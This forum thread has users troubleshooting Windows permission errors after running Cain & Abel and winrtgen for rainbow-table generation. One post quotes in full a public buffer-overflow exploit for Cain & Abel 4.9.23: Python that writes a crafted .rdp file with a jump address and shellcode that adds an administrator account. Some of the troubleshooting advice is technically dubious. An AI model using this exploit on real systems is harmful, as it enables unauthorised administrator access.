Windows files permission question

[Still_Learning]

question.. i had my pc running for a couple days creating new rainbow tables useing oxid's winrtgen program.. my pc froze up it seemed like and took forever, so i rebooted it then came to an boot error so i had to put in the windows disc to recover the boot files think it was a pci.sys file or something..

i uninstalled cain and winrtgen and tried to reinstall , but everytime itry to run the program now it gives me an error saying "windows can not access the specified device, path or file. You may not have appropriate permissions to access the item." Did my pc get owned or what.. how do i change the permission, as far as i know im the admin, i can do anything the admin can do, access the command prompt, goto admin tools, change user accounts, ect..

scratch that.. i tried to goto my user accounts and it was a blank screen that froze and said "Not responding" i have my pc backed up with norton ghost but would prefer not to have to use the back up image and figure out what is causeing the error or problem
thanks

[ebrizzlez]

Sounds like Windows Vista to me.

If you can, boot into safe mode and try to uninstall the program. And use a registry cleanup program. Most likely their registers that arn't fully cleaned yet and still has the program's path file name. Try installing on an alternative location if so.

On vista if UAC is activated than kernel operands and operations take a bit longer because UAC has to verify that you have proper rights.

btw:
The crash probably resulted in an unproperly dumped RAM, it happens alot in Vista. If you rebooted hardboot,[holding the shiney button down] than the RAM , Random Access Memory can't be cleaned away properly and creates a page fault which Vista loads up and can't read properly so it normally crashes in these cases. Especially when its doing important kernel operations

[Still_Learning]

as far as i know it is a modded windows XP pro, also says windows XP essentials at sometimes.. not vista though

my first reaction was to uninstall it, i ran cc cleaner and wise registry checker to delete all the bad key strings. I also opened up cports and process explorer to see if anything weird was running out of the normal and did not see anything unussual. maybe i need to download a new copy of cain? the one i used was from a .rar/.zip format , from what i though a .rar/.zip file can not be infected after its .zipped or archived.. would that be false to say?

I was running a program which is suppose to optimize my pc's ram called FreeRam XP pro, which maybe doing more harm then whats its worth being installed? i have 2 GB ram, dual core AMD 4000+

I got into the user accounts and there seems to be a new one now called "ASP.NET machine A's.." account with limited access / PW protected.. wtf

[ebrizzlez]

Windows XP Essential is a stripped down boot version of XP. It's probably missing a few tools, but normally it wouldn't matter. But sometimes these tools are necessary. Don't know.

Zip files can't actually be infected themselves, but the contents inside of teh zips can. ;]

If your so skeptical about security, download AVG.

Some programs like, GFI LanGuard,require to make a new account on Windows so it can perform its operations on that account. It's a weird, but thats how some programs are. So the .ASP Net Account is probably used for a newly installed NET program, the Net framework is kind of werid.

Try redownloading Cain and switching the install directory, when generating rainbow tables make sure you don't have another program running, FreeRam XP is just probably dumps unneeded RAM, but since rainbow table use Time-Memory-Trade-Off the Freeram program maybe dumping RAM that is needed it just doesn't know it so the program has to regenerate those tables in memory again. Run FreeRAM XP before using Cain or Rainbow Tables, than make sure its fully close..

Recommend a system scan, but like I said, I highly doubt your really in a serious infection.

[rhysh]

is the file actually there?

run file mon and see if anything is accessing it

[bad_brain]

hm, I used winrtgen too some days ago, if you got it from oxid.it it is clean.
when running winrtgen is uses all available CPU resources, so the CPU load goes to 100%....that's normal, you can evade it by giving the process a lower priority by using Process Explorer for example.

as you know winrtgen needs no install, it's simply an exe, so the problem is most likely caused by Cain....Cain is labeled as malware by many AVs (hacktool ), so this is the causing your problem I guess.

[Still_Learning]

run mon? whats that? The file is actully there, and im pretty sure my AV did not pick it up as a virus because it ran fine before for like 30 hours. I uninstalled / deleted both and am going to try and D/L it again then reinstall, yes I got it directly from Oxid's site, so it should be clean (unless of course Oxid put a backdoor in it, which i would not doubt)

How do i check for hidden processes? My computer seems to be running very slow lately. So by default it looks like the priority of everything is normal, if i change some processes that are not as important to low and others which slow the computer down like my AV to top priority will that speed it up? what exactly does the 24-4#'s mean next to the priority? is that how many MB's of ram it is useing?

[Still_Learning]

BTW.. I found a new exploit on Cain & Abel 4.9.23 (which i think is the newest version) dealing with buffer overflows..

Code: Select all

#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
#shellcode+= "\xd7\xab\x63\x3d";

eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7

chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"\x90"*10+shellcode)
file.close()
print "D0NE!"

# milw0rm.com [2008-12-03]

do you think this could be the case? RDP hack to my system , so 2 people have admin privledges, and locking me out of certain programs?
I had another program give me the same error today it was coolris, after i did the firefox plug in update. (its some browser addin that makes the web look like a wall of a bunch of pages , it is pretty allright)

i deleted all cain and able stuff, keys, coolris, ran virii check, but i think i wil use another virii scanner also. '

How do you read shellcode like that? is that Python?
I apologize for the 1000 questions

[ebrizzlez]

Seems the code makes a file called cain.rdp and the assumed buffer overflow is injected into that file. So I doubt its that actually exploit. buttt...

I would try to explain the code, but its kinda complicated if you don't get shellcode. Basically, the shellcode is all in hex, and are just a bunch of memory values. The program doesn't have any remote features, their's no network protocols used, so it is not a remote exploit. It would have to be a local exploit, so if you opened up a file .rdp(remote desktop password decoder file) than teh exploit would r00t you.

But as you described, you weren't dealing with remote desktop password decoder, or any of its file formats. So this isn't your case.

[Still_Learning]

Yes, please let me know your conclusion. I have put a ban on Cain and Able now and other programs giving me problems. I dont want to have to resort to my ghost image backup , allthough it would be cool because i have not backed up an image from my usb drive to PC yet and would be a learning experience.

Is shellcode, its own code? not related to assembly, basic, fortran, pascal, batch, ect..?? edit: no cain.rpd file was found.. also whats with able? I thought able was the remote/server, cain is the client / 2 parts.. cain and able